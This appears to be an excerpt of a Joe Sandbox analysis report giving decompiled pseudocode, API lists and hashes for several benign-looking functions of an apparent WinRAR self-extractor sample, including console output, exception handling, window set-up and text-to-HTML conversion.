                                                    0x00cd9df8
                                                    0x00cd9dfa
                                                    0x00cd9e0f
                                                    0x00cd9e12
                                                    0x00cd9e13
                                                    0x00cd9e16
                                                    0x00cd9e1a
                                                    0x00cd9e1b
                                                    0x00cd9e1e
                                                    0x00cd9e22
                                                    0x00cd9e24
                                                    0x00cd9e27
                                                    0x00cd9e29
                                                    0x00cd9e2c
                                                    0x00cd9e2c
                                                    0x00cd9e2c
                                                    0x00cd9e22
                                                    0x00cd9e38
                                                    0x00cd9e3b
                                                    0x00cd9e40
                                                    0x00cd9e43
                                                    0x00cd9e47
                                                    0x00cd9e7b
                                                    0x00cd9e7d
                                                    0x00cd9e80
                                                    0x00cd9ea1
                                                    0x00cd9ea1
                                                    0x00cd9ea4
                                                    0x00cd9ea9
                                                    0x00cd9eab
                                                    0x00cd9eab
                                                    0x00cd9eae
                                                    0x00cd9eae
                                                    0x00000000
                                                    0x00cd9ea9
                                                    0x00cd9e82
                                                    0x00cd9e86
                                                    0x00cd9e86
                                                    0x00cd9e89
                                                    0x00cd9e8c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9e8e
                                                    0x00cd9e91
                                                    0x00cd9e94
                                                    0x00cd9e96
                                                    0x00cd9e98
                                                    0x00cd9e9b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9e9b
                                                    0x00cd9e9d
                                                    0x00000000
                                                    0x00cd9e49
                                                    0x00cd9e49
                                                    0x00cd9e4b
                                                    0x00cd9e4e
                                                    0x00cd9e76
                                                    0x00cd9e76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9e50
                                                    0x00cd9e50
                                                    0x00cd9e58
                                                    0x00cd9e5d
                                                    0x00cd9e62
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9e64
                                                    0x00cd9e6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9e6e
                                                    0x00cd9e70
                                                    0x00cd9e70
                                                    0x00cd9e73
                                                    0x00000000
                                                    0x00cd9e73
                                                    0x00cd9eb1
                                                    0x00cd9eb3
                                                    0x00cd9eb6
                                                    0x00cd9ebc
                                                    0x00cd9ebc
                                                    0x00000000
                                                    0x00cd9d53

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                    • API String ID: 176396367-3568243669
                                                    • Opcode ID: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                    • Instruction ID: 6ff7ba4a208aa532897f291575f68526f314e0ada4a5112e245f6565554f92b2
                                                    • Opcode Fuzzy Hash: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                    • Instruction Fuzzy Hash: F551046E74032295DB30AA259811777B3E2DFA5750F68042BFFD18B7C0FB758E818261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00CEF68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd22290 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0xd22290 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E00CEA767(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E00CE930D( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00CE930D();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									_t48 = _t130 + 8; // 0xff76e900
									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00CDFBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
			}





































                                                    0x00cef695
                                                    0x00cef69c
                                                    0x00cef69f
                                                    0x00cef6a7
                                                    0x00cef6ab
                                                    0x00cef6b7
                                                    0x00cef6ba
                                                    0x00cef6bd
                                                    0x00cef6c4
                                                    0x00cef6cc
                                                    0x00cef6cf
                                                    0x00cef6d5
                                                    0x00cef6db
                                                    0x00cef6e0
                                                    0x00cef6e2
                                                    0x00cef6e5
                                                    0x00cef6ea
                                                    0x00cef6f4
                                                    0x00cef6fb
                                                    0x00cef6fe
                                                    0x00cef705
                                                    0x00cef70c
                                                    0x00cef727
                                                    0x00cef72f
                                                    0x00cef738
                                                    0x00cef75e
                                                    0x00cef760
                                                    0x00000000
                                                    0x00cef73a
                                                    0x00cef73d
                                                    0x00cef804
                                                    0x00cef810
                                                    0x00cef81b
                                                    0x00cef820
                                                    0x00cef743
                                                    0x00cef74a
                                                    0x00cef74f
                                                    0x00cef755
                                                    0x00cef75b
                                                    0x00000000
                                                    0x00cef75b
                                                    0x00cef755
                                                    0x00cef73d
                                                    0x00cef70e
                                                    0x00cef712
                                                    0x00cef715
                                                    0x00cef71b
                                                    0x00cef71d
                                                    0x00cef720
                                                    0x00cef724
                                                    0x00cef761
                                                    0x00cef764
                                                    0x00cef765
                                                    0x00cef76a
                                                    0x00cef770
                                                    0x00cef776
                                                    0x00cef785
                                                    0x00cef78b
                                                    0x00cef791
                                                    0x00cef796
                                                    0x00cef7b2
                                                    0x00cef825
                                                    0x00cef82b
                                                    0x00cef7b4
                                                    0x00cef7b4
                                                    0x00cef7bc
                                                    0x00cef7c5
                                                    0x00cef7cb
                                                    0x00000000
                                                    0x00cef7cd
                                                    0x00cef7cf
                                                    0x00cef7d2
                                                    0x00cef7eb
                                                    0x00000000
                                                    0x00cef7ed
                                                    0x00cef7f1
                                                    0x00cef7f3
                                                    0x00cef7f6
                                                    0x00000000
                                                    0x00cef7f6
                                                    0x00cef7f1
                                                    0x00cef7eb
                                                    0x00cef7cb
                                                    0x00cef7c5
                                                    0x00cef7b2
                                                    0x00cef796
                                                    0x00cef770
                                                    0x00000000
                                                    0x00cef7f9
                                                    0x00cef7f9
                                                    0x00cef82d
                                                    0x00cef83f

                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CEFE02,00000000,00000000,00000000,00000000,00000000,00CE529F), ref: 00CEF6CF
                                                    • __fassign.LIBCMT ref: 00CEF74A
                                                    • __fassign.LIBCMT ref: 00CEF765
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CEF78B
                                                    • WriteFile.KERNEL32(?,00000000,00000000,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7AA
                                                    • WriteFile.KERNEL32(?,00000000,00000001,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: 035dd0f523052ea948ecadd1d73fdb4d310ab347bef2ac389915fb1f7b841057
                                                    • Instruction ID: a59308952565a12aad10b89e7d33d016f83caa2b6081c8ab4881ef758cc7ecbd
                                                    • Opcode Fuzzy Hash: 035dd0f523052ea948ecadd1d73fdb4d310ab347bef2ac389915fb1f7b841057
                                                    • Instruction Fuzzy Hash: BC5195B1900289AFDB10CFA5DC55BEEBBF4EF09300F14416EE555E7291D630AA42CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00CE2900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00CF2567(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xcfe7ac;
				E00CE28C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xcfe7ac);
				E00CE396C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00CE3AF0(_t77, 0xfffffffe, _t96, 0xcfe7ac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00CE3A90(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00CE28C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xcf58dc;
											if(__eflags != 0) {
												_t72 = E00CF2090(__eflags, 0xcf58dc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xcf58dc; // 0xce0150
													 *0xcf3278(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00CE3AD0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00CE3AF0(_t64, _t93, _t96, 0xcfe7ac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00CE28C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00CE3AB0();
										asm("int3");
										__eflags = E00CE3B07();
										if(__eflags != 0) {
											_t67 = E00CE2B8C(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00CE3B43();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}





























                                                    0x00ce2900
                                                    0x00ce2907
                                                    0x00ce290b
                                                    0x00ce290c
                                                    0x00ce2912
                                                    0x00ce291e
                                                    0x00ce2920
                                                    0x00ce2926
                                                    0x00ce2926
                                                    0x00ce292f
                                                    0x00ce2931
                                                    0x00ce2934
                                                    0x00ce2937
                                                    0x00ce293f
                                                    0x00ce2944
                                                    0x00ce2947
                                                    0x00ce294a
                                                    0x00ce2951
                                                    0x00ce29ad
                                                    0x00ce29b0
                                                    0x00ce29b8
                                                    0x00ce29bf
                                                    0x00000000
                                                    0x00ce29bf
                                                    0x00000000
                                                    0x00ce2953
                                                    0x00ce2953
                                                    0x00ce2959
                                                    0x00ce295f
                                                    0x00ce2965
                                                    0x00ce29d0
                                                    0x00ce29d9
                                                    0x00ce2967
                                                    0x00ce2967
                                                    0x00ce2967
                                                    0x00ce296d
                                                    0x00ce2970
                                                    0x00ce2973
                                                    0x00ce2976
                                                    0x00ce2979
                                                    0x00ce297e
                                                    0x00ce2994
                                                    0x00000000
                                                    0x00ce2980
                                                    0x00ce2980
                                                    0x00ce2982
                                                    0x00ce2987
                                                    0x00ce2989
                                                    0x00ce298c
                                                    0x00ce298e
                                                    0x00ce29a4
                                                    0x00ce29c4
                                                    0x00ce29c4
                                                    0x00ce29c8
                                                    0x00000000
                                                    0x00ce2990
                                                    0x00ce2990
                                                    0x00ce29da
                                                    0x00ce29dd
                                                    0x00ce29e3
                                                    0x00ce29e5
                                                    0x00ce29ec
                                                    0x00ce29f3
                                                    0x00ce29f8
                                                    0x00ce29fb
                                                    0x00ce29fd
                                                    0x00ce29ff
                                                    0x00ce2a0c
                                                    0x00ce2a12
                                                    0x00ce2a14
                                                    0x00ce2a17
                                                    0x00ce2a17
                                                    0x00ce2a1a
                                                    0x00ce2a1a
                                                    0x00ce29ec
                                                    0x00ce2a20
                                                    0x00ce2a22
                                                    0x00ce2a27
                                                    0x00ce2a2a
                                                    0x00ce2a2d
                                                    0x00ce2a35
                                                    0x00ce2a39
                                                    0x00ce2a3e
                                                    0x00ce2a3e
                                                    0x00ce2a41
                                                    0x00ce2a45
                                                    0x00ce2a48
                                                    0x00ce2a55
                                                    0x00ce2a58
                                                    0x00ce2a5d
                                                    0x00ce2a63
                                                    0x00ce2a65
                                                    0x00ce2a6a
                                                    0x00ce2a6f
                                                    0x00ce2a71
                                                    0x00ce2a7c
                                                    0x00ce2a73
                                                    0x00ce2a73
                                                    0x00000000
                                                    0x00ce2a73
                                                    0x00ce2a67
                                                    0x00ce2a67
                                                    0x00ce2a67
                                                    0x00ce2a69
                                                    0x00ce2a69
                                                    0x00ce2992
                                                    0x00000000
                                                    0x00ce2992
                                                    0x00ce2990
                                                    0x00ce298e
                                                    0x00000000
                                                    0x00ce2997
                                                    0x00ce2997
                                                    0x00ce2999
                                                    0x00ce29a0
                                                    0x00000000
                                                    0x00ce29a2
                                                    0x00000000
                                                    0x00ce29a0
                                                    0x00ce2965
                                                    0x00000000

                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE2937
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE293F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE29C8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE29F3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE2A48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: a80ae5081d7dac65efdab6e7c0c047b07bd01f21fc7b29a8eb0763e1043bc4c0
                                                    • Instruction ID: a4af6e600449a7f7ed2bdb41fd1e18e2add349fdd0cd8f94d7abb16488d73d64
                                                    • Opcode Fuzzy Hash: a80ae5081d7dac65efdab6e7c0c047b07bd01f21fc7b29a8eb0763e1043bc4c0
                                                    • Instruction Fuzzy Hash: F141DB30A00288AFCF10DF6AC885BAE7BB9EF44314F148065E9159B393D771DA41DF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E00CD9ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00CD9C04(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00CE3E2E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00CE7625(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00CE7625(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xd23108(0,  *0xd23154(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xd23110( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xd23118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xd23154(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xd2310c( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00CD9CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L00CE3E2E(_t67);
							}
						}
					}
				}
				return _t44;
			}















                                                    0x00cd9ede
                                                    0x00cd9ee2
                                                    0x00cd9ee8
                                                    0x00cd9eeb
                                                    0x00cd9eee
                                                    0x00cd9efa
                                                    0x00cd9f03
                                                    0x00cd9f08
                                                    0x00cd9f0d
                                                    0x00cd9f13
                                                    0x00cd9f19
                                                    0x00cd9f1d
                                                    0x00cd9f15
                                                    0x00cd9f15
                                                    0x00cd9f15
                                                    0x00cd9f28
                                                    0x00cd9f2b
                                                    0x00cd9f31
                                                    0x00cd9f35
                                                    0x00cd9f2d
                                                    0x00cd9f2d
                                                    0x00cd9f2d
                                                    0x00cd9f3b
                                                    0x00cd9f44
                                                    0x00cd9f5b
                                                    0x00cd9f65
                                                    0x00cd9f6a
                                                    0x00cd9f6a
                                                    0x00cd9f70
                                                    0x00cd9f7e
                                                    0x00cd9fab
                                                    0x00cd9fb1
                                                    0x00cd9fb8
                                                    0x00cd9ff2
                                                    0x00cd9ff4
                                                    0x00cd9ff9
                                                    0x00000000
                                                    0x00cda002
                                                    0x00cd9fba
                                                    0x00cd9fbc
                                                    0x00cd9fc3
                                                    0x00cd9fc6
                                                    0x00cd9fcd
                                                    0x00cd9fd2
                                                    0x00cd9fd6
                                                    0x00cd9fdb
                                                    0x00cd9fe3
                                                    0x00000000
                                                    0x00cd9fef
                                                    0x00cd9fd6
                                                    0x00cd9fc6
                                                    0x00cd9fbc
                                                    0x00cda00e

                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00CD9EEE
                                                    • GetWindowRect.USER32(?,00000000), ref: 00CD9F44
                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00CD9FDB
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00CD9FE3
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00CD9FF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$RectText
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 3937224194-1658105358
                                                    • Opcode ID: c86f255045f3c22ae948310aec675c69deb7a8116bcda6c86acea3491f7a932d
                                                    • Instruction ID: fdb64cb1e31c66fde1bc8965ee3f7b0f7c71133d067d59caa11f01cad1c1a818
                                                    • Opcode Fuzzy Hash: c86f255045f3c22ae948310aec675c69deb7a8116bcda6c86acea3491f7a932d
                                                    • Instruction Fuzzy Hash: BA41D331004310EFCB225FA5DC48B6B7BA8FF58701F00455AFA4AEA256DB38EA15CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00CD9955(void* __edx, void* __eflags) {
				void* __ecx;
				signed int _t25;
				void* _t29;
				signed int _t30;
				intOrPtr _t31;
				void* _t35;
				signed int _t38;
				signed int _t45;
				void* _t51;
				signed short* _t52;
				void* _t53;
				signed short* _t55;
				signed short* _t57;
				signed short* _t58;
				void* _t59;
				void* _t60;

				_t57 =  *(_t59 + 0x10);
				_push(0x200 + E00CE3E13(_t57) * 0xc);
				_t52 = E00CE3E33(0x200 + E00CE3E13(_t57) * 0xc);
				 *(_t59 + 0x10) = _t52;
				if(_t52 != 0) {
					E00CE6066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t38 = E00CE3E13(_t52);
					_t60 = _t59 + 0xc;
					_t25 =  *_t57 & 0x0000ffff;
					_t55 = _t57;
					if(_t25 == 0) {
						L19:
						_t52[_t38] = 0;
						L00CE3E2E(_t57);
						return _t52;
					}
					_t45 = _t25;
					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
					_t29 = 0xd;
					_t51 = 0xa;
					do {
						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
							if(_t55 <= _t57) {
								L17:
								_t52[_t38] = _t45;
								_t38 = _t38 + 1;
								goto L18;
							}
							_t31 =  *((intOrPtr*)(_t60 + 0x14));
							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
								goto L17;
							} else {
								E00CE6066( &(_t52[_t38]), L"&nbsp;");
								_t38 = _t38 + 6;
								goto L16;
							}
						} else {
							_t58 =  &(_t52[_t38]);
							_t53 = 0xa;
							while(_t55[3] == _t53) {
								E00CE6066(_t58, L"<br>");
								_t55 =  &(_t55[2]);
								_t38 = _t38 + 4;
								_t35 = 0xd;
								_t58 =  &(_t58[4]);
								if(_t55[2] == _t35) {
									continue;
								}
								break;
							}
							_t52 =  *(_t60 + 0x10);
							_t55 =  &(_t55[1]);
							_t57 =  *(_t60 + 0x1c);
							L16:
							_t51 = 0xa;
						}
						L18:
						_t55 =  &(_t55[1]);
						_t30 =  *_t55 & 0x0000ffff;
						_t45 = _t30;
						_t29 = 0xd;
					} while (_t30 != 0);
					goto L19;
				}
				return _t57;
			}



















                                                    0x00cd9958
